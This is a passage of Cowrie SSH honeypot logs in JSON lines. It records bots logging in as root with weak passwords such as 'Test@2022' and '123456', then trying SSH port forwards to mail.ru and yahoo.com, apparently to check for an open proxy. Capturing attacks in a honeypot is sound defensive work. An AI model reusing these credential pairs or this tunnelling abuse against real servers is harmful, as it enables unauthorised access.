{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60157,"dst_ip":"1.2.3.4","dst_port":22,"session":"965e89daa415","protocol":"ssh","message":"New connection: 77.83.207.83:60157 (1.2.3.4:22) [session: 965e89daa415]","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.628034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.638348Z","src_ip":"77.83.207.83","session":"965e89daa415"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.678090Z","src_ip":"77.83.207.83","session":"965e89daa415"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.926058Z","src_ip":"77.83.207.83","session":"965e89daa415"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22884,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22884","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.976661Z","session":"965e89daa415"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.026934Z","src_ip":"77.83.207.83","session":"965e89daa415"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":31936,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31936","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.168195Z","session":"965e89daa415"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.218254Z","src_ip":"77.83.207.83","session":"965e89daa415"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43822,"dst_ip":"1.2.3.4","dst_port":22,"session":"56880aaea8ae","protocol":"ssh","message":"New connection: 212.227.235.229:43822 (1.2.3.4:22) [session: 56880aaea8ae]","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.318060Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":21407,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21407","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.359965Z","session":"965e89daa415"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.365073Z","src_ip":"212.227.125.160","session":"8bc7a742e592"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.409652Z","src_ip":"77.83.207.83","session":"965e89daa415"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.460616Z","src_ip":"77.83.207.83","session":"965e89daa415"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60249,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2b261600088","protocol":"ssh","message":"New connection: 77.83.207.83:60249 (1.2.3.4:22) [session: e2b261600088]","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.510454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.520913Z","src_ip":"77.83.207.83","session":"e2b261600088"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.561734Z","src_ip":"77.83.207.83","session":"e2b261600088"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.816438Z","src_ip":"77.83.207.83","session":"e2b261600088"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17366,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17366","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.868232Z","session":"e2b261600088"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:16.919654Z","src_ip":"77.83.207.83","session":"e2b261600088"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21391,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21391","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.065363Z","session":"e2b261600088"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.116327Z","src_ip":"77.83.207.83","session":"e2b261600088"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":22933,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22933","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.261311Z","session":"e2b261600088"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.312404Z","src_ip":"77.83.207.83","session":"e2b261600088"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.364651Z","src_ip":"77.83.207.83","session":"e2b261600088"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60346,"dst_ip":"1.2.3.4","dst_port":22,"session":"79c2595c2e76","protocol":"ssh","message":"New connection: 77.83.207.83:60346 (1.2.3.4:22) [session: 79c2595c2e76]","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.414885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.425144Z","src_ip":"77.83.207.83","session":"79c2595c2e76"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.466337Z","src_ip":"77.83.207.83","session":"79c2595c2e76"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.720690Z","src_ip":"77.83.207.83","session":"79c2595c2e76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7426,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7426","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.773175Z","session":"79c2595c2e76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.824208Z","src_ip":"77.83.207.83","session":"79c2595c2e76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":18261,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18261","sensor":"my-vps","timestamp":"2025-08-31T03:47:17.969348Z","session":"79c2595c2e76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.020388Z","src_ip":"77.83.207.83","session":"79c2595c2e76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":25657,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25657","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.165376Z","session":"79c2595c2e76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.216746Z","src_ip":"77.83.207.83","session":"79c2595c2e76"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.268537Z","src_ip":"77.83.207.83","session":"79c2595c2e76"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60458,"dst_ip":"1.2.3.4","dst_port":22,"session":"73ff17dd3860","protocol":"ssh","message":"New connection: 77.83.207.83:60458 (1.2.3.4:22) [session: 73ff17dd3860]","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.317768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.318690Z","src_ip":"77.83.207.83","session":"73ff17dd3860"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.368678Z","src_ip":"77.83.207.83","session":"73ff17dd3860"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.618699Z","src_ip":"77.83.207.83","session":"73ff17dd3860"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.661437Z","src_ip":"212.227.235.229","session":"56880aaea8ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.662553Z","src_ip":"212.227.235.229","session":"56880aaea8ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17541,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17541","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.669704Z","session":"73ff17dd3860"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.720038Z","src_ip":"77.83.207.83","session":"73ff17dd3860"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":1598,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:1598","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.860461Z","session":"73ff17dd3860"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:18.910722Z","src_ip":"77.83.207.83","session":"73ff17dd3860"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":20895,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20895","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.052601Z","session":"73ff17dd3860"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.102926Z","src_ip":"77.83.207.83","session":"73ff17dd3860"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.153801Z","src_ip":"77.83.207.83","session":"73ff17dd3860"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60557,"dst_ip":"1.2.3.4","dst_port":22,"session":"876f14b64b93","protocol":"ssh","message":"New connection: 77.83.207.83:60557 (1.2.3.4:22) [session: 876f14b64b93]","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.203003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.213025Z","src_ip":"77.83.207.83","session":"876f14b64b93"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-